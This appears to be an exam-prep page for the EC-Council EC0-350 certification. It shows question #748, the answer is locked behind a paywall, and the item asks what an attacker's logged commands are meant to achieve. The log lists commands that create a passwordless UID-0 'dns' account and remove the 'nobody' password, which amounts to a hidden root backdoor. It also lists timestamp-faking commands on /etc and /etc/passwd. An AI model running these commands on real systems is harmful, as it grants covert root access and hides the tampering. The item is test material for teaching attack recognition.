EC-Council
EC0-350 · Question #748
EC0-350 Question #748: Real Exam Question with Answer & Explanation
Sign in or unlock EC0-350 to reveal the answer and full explanation for question #748. The question stem and answer options stay visible for context.
Question
After studying the following log entries, what is the attacker ultimately trying to achieve as inferred from the log sequence? 1. mkdir -p /etc/X11/applnk/Internet/.etc 2. mkdir -p /etc/X11/applnk/Internet/.etcpasswd 3. touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd 4. touch -acmr /etc /etc/X11/applnk/Internet/.etc 5. passwd nobody -d 6. /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash 7. passwd dns -d 8. touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd 9. touch -acmr /etc/X11/applnk/Internet/.etc /etc
Options
- AChange password of user nobody
- BExtract information from a local directory
- CChange the files Modification Access Creation times
- DDownload rootkits and passwords into a new directory
Unlock EC0-350 to see the answer
You've previewed enough free EC0-350 questions. Unlock EC0-350 for full answers, explanations, the timed quiz mode, progress tracking, and the master PDF. Question stem and options stay visible so you can still see what's on the exam.